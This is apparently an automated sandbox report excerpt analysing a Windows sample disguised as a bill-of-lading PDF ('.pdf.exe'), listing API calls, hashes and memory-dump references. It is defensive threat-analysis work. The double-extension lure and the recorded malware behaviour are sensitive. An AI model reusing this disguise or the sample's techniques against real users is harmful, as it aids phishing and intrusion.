• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
• String ID: 0
• API String ID: 176399719-4108050209
• Opcode ID: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
• Instruction ID: 98f94d81d6847d6484dd50bbdc77a0bd9f9f2d632c710d3394220f00cc789bef
• Opcode Fuzzy Hash: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
• Instruction Fuzzy Hash: 86417675604201AFD700CF68D894A9BBBE4FF89314F14891EFA488B350DBB5A845CFA6
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
• GetDlgCtrlID.USER32(00000000), ref: 00469289
• GetParent.USER32 ref: 004692A4
• SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
• GetDlgCtrlID.USER32(00000000), ref: 004692AE
• GetParent.USER32 ref: 004692C7
• SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: MessageSend$CtrlParent$_wcslen
• String ID: ComboBox$ListBox
• API String ID: 2040099840-1403004172
                                                                                                                      • Opcode ID: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                                                                      • Instruction ID: ef07326ddff4210f4741e87947fad3c2ec39ee11b6619cfdf8cc81125e1c6f8c
                                                                                                                      • Opcode Fuzzy Hash: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                                                                      • Instruction Fuzzy Hash: BC21D6716002147BD600AB65CC45DBFB39CEB85324F044A1FF954A73D1DAB8EC0947B9
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
• GetDlgCtrlID.USER32(00000000), ref: 00469483
• GetParent.USER32 ref: 0046949E
• SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
• GetDlgCtrlID.USER32(00000000), ref: 004694A8
• GetParent.USER32 ref: 004694C1
• SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: MessageSend$CtrlParent$_wcslen
• String ID: ComboBox$ListBox
• API String ID: 2040099840-1403004172
• Opcode ID: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
• Instruction ID: 434b10a17d45167e777e8ea6e726dd6ee4e01267e4a119798c8aa60e835c5cdc
• Opcode Fuzzy Hash: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
• Instruction Fuzzy Hash: CA21D7756002147BD600BB29CC45EBFB39CEB85314F04492FF984A7291EABCEC0A4779
APIs
  • Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53
• SendMessageW.USER32(75C123D0,00001001,00000000,00000000), ref: 00448E73
• SendMessageW.USER32(75C123D0,00001026,00000000,00000000), ref: 00448E7E
  • Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: MessageSend$BrushCreateDeleteObjectSolid
• String ID:
• API String ID: 3771399671-0
• Opcode ID: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
• Instruction ID: ebbecaf0548398ae771b9aa28ebf0b72f134f9ffbbfb28b2279bd799396bd9e3
• Opcode Fuzzy Hash: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
• Instruction Fuzzy Hash: F4510930208300AFE2209F25DD85F6F77EAEB85B14F14091EF994E72D0CBB9E9458769
APIs
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: InitVariant$_malloc_wcscpy_wcslen
• String ID:
• API String ID: 3413494760-0
• Opcode ID: afb533e23b19910be0c027df8fa87fd227b592e7e5a0e6e969ae1a59b8da4157
• Instruction ID: 77b59fa0745152fd1b6386ccdd9ca850b9b7f4abb66e551d88b584249de3d357
• Opcode Fuzzy Hash: afb533e23b19910be0c027df8fa87fd227b592e7e5a0e6e969ae1a59b8da4157
• Instruction Fuzzy Hash: F83150B2600746AFC714DF7AC880996FBA8FF88310B44892EE64983641D735F554CBA5
APIs
• GetCurrentThreadId.KERNEL32 ref: 004377D7
• GetForegroundWindow.USER32(00000000,?,?,?,?,0045FDE0,?,?,00000001), ref: 004377EB
• GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 00437809
• GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043782E
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043783D
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 0043788D
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378A1
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378AC
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
• Opcode ID: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
• Instruction ID: cf5237ead9178137421241ba4763476990ac919c12b5de4495d1c20f4e3090f4
• Opcode Fuzzy Hash: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
• Instruction Fuzzy Hash: B0316FB1504341AFD768EF28DC88A7BB7A9EF9D310F14182EF44197250D7B89C44CB69
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: __wcsicoll
• String ID: 0%d$DOWN$OFF
• API String ID: 3832890014-468733193
• Opcode ID: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
• Instruction ID: 3901981f80fa7430cd77b89167089bc3925961a07aad88d0cc2f25a35af8916b
• Opcode Fuzzy Hash: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
• Instruction Fuzzy Hash: B7F1D8614083856DEB21EB21C845BAF7BE85F95309F08092FF98212193D7BCD68DC76B
APIs
• VariantInit.OLEAUT32(00000000), ref: 0045E959
• VariantCopy.OLEAUT32(00000000), ref: 0045E963
• VariantClear.OLEAUT32 ref: 0045E970
• VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
• __swprintf.LIBCMT ref: 0045EB1F
• VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
• VariantInit.OLEAUT32(00000000), ref: 0045EBE7
Strings
• %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
• String ID: %4d%02d%02d%02d%02d%02d
• API String ID: 43541914-1568723262
• Opcode ID: 59f20d5c687eca5b8ac21bf224ed8e62dc0999386ac77495242af5446a13f09a
• Instruction ID: db8708ae94f177a13b26e6bf0e0b18ed2eb17208bc27bd00c320e315e6f9d40a
• Opcode Fuzzy Hash: 59f20d5c687eca5b8ac21bf224ed8e62dc0999386ac77495242af5446a13f09a
• Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6
APIs
• InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FE66
• Sleep.KERNEL32(0000000A), ref: 0042FE6E
• InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FF5D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: DecrementInterlocked$Sleep
• String ID: 0vH$0vH$4RH0vH$@COM_EVENTOBJ
• API String ID: 2250217261-3412429629
• Opcode ID: 8ee3dc3b90658de1bdba7935e7c509bae4c97cbbd898303c1487c3161a53cb39
• Instruction ID: 990b5f35a06538e4ae7b6c94f393f4a5fafaaf51bfa382c75dcb300f2d234fa3
• Opcode Fuzzy Hash: 8ee3dc3b90658de1bdba7935e7c509bae4c97cbbd898303c1487c3161a53cb39
• Instruction Fuzzy Hash: E0B1C0715083009FC714EF54C990A5FB3E4AF98304F508A2FF495972A2DB78ED4ACB9A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                      • API String ID: 0-1603158881
                                                                                                                      • Opcode ID: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                                                                      • Instruction ID: 1d39c91c6ba170ccd8bd44326015c92659356e06a413e753493f98454e3169a0
                                                                                                                      • Opcode Fuzzy Hash: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                                                                      • Instruction Fuzzy Hash: 49A1D3B14043459BCB20EF50CC81BDE37A4AF94348F44891FF9896B182EF79A64DC76A
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00479D1F
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00479F06
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00479F11
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00479DF7
                                                                                                                        • Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
                                                                                                                        • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
                                                                                                                        • Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00479F9C
                                                                                                                        • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                        • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                        • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                        • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$Copy$ClearInit$ErrorLast_memset
                                                                                                                      • String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                      • API String ID: 665237470-60002521
                                                                                                                      • Opcode ID: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                                                      • Instruction ID: 799f1794578ead7d01377608c22e1fb401aa4fc5ffca8a64c02b8280356d09a3
                                                                                                                      • Opcode Fuzzy Hash: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                                                      • Instruction Fuzzy Hash: 6091B272204341AFD720DF64D880EABB7E9EFC4314F50891EF28987291D7B9AD45C766
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConnectRegistry_wcslen
                                                                                                                      • String ID: HH
                                                                                                                      • API String ID: 535477410-2761332787
                                                                                                                      • Opcode ID: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                                                                      • Instruction ID: 68d8ff7817732ac0dd8275009c421e29eb5870de2046e22f9b94a35ba54c9d9f
                                                                                                                      • Opcode Fuzzy Hash: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                                                                      • Instruction Fuzzy Hash: FE617FB56083009FD304EF65C981F6BB7E4AF88704F14891EF681A7291D678ED09CB97
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0045F317
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F367
                                                                                                                      • IsMenu.USER32(?), ref: 0045F380
                                                                                                                      • CreatePopupMenu.USER32 ref: 0045F3C5
                                                                                                                      • GetMenuItemCount.USER32(?), ref: 0045F42F
                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,?), ref: 0045F45B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                      • String ID: 0$2
                                                                                                                      • API String ID: 3311875123-3793063076
                                                                                                                      • Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                                                                      • Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
                                                                                                                      • Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                                                                      • Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe), ref: 0043719E
                                                                                                                      • LoadStringW.USER32(00000000), ref: 004371A7
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
                                                                                                                      • LoadStringW.USER32(00000000), ref: 004371C0
                                                                                                                      • _printf.LIBCMT ref: 004371EC
                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00437208
                                                                                                                      Strings
                                                                                                                      • C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe, xrefs: 00437189
                                                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 004371E7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleLoadModuleString$Message_printf
                                                                                                                      • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe
                                                                                                                      • API String ID: 220974073-3888059103
                                                                                                                      • Opcode ID: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                                                                      • Instruction ID: cc9e6972dbc5209964c20f0f7d1f7455a13934f6c555fd98bc0bf92a0502fb90
                                                                                                                      • Opcode Fuzzy Hash: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                                                                      • Instruction Fuzzy Hash: F7014FB2A543447AE620EB549D06FFB365CABC4B01F444C1EB794A60C0AAF865548BBA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                                                                      • Instruction ID: 20732dcab93056f759d0b04a6df1a57780e33876730225f1fefd21ccf2a16f59
                                                                                                                      • Opcode Fuzzy Hash: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                                                                      • Instruction Fuzzy Hash: 36519070200301ABD320DF29CC85F5BB7E8EB48715F540A1EF995E7292D7B4E949CB29
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,?,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,004A8E80,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,0040F3D2), ref: 0040FFCA
                                                                                                                        • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 0045355E
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0045358E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 978794511-0
                                                                                                                      • Opcode ID: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                                                      • Instruction ID: dcad70f49e32ae1adaf0c812d378eb0bba467e0a617048934f4a65f03e3a0b24
                                                                                                                      • Opcode Fuzzy Hash: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                                                      • Instruction Fuzzy Hash: 665162B25043406AC724EF61D885ADFB3E8AFC8305F44992EB94992151E73DD34DC767
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
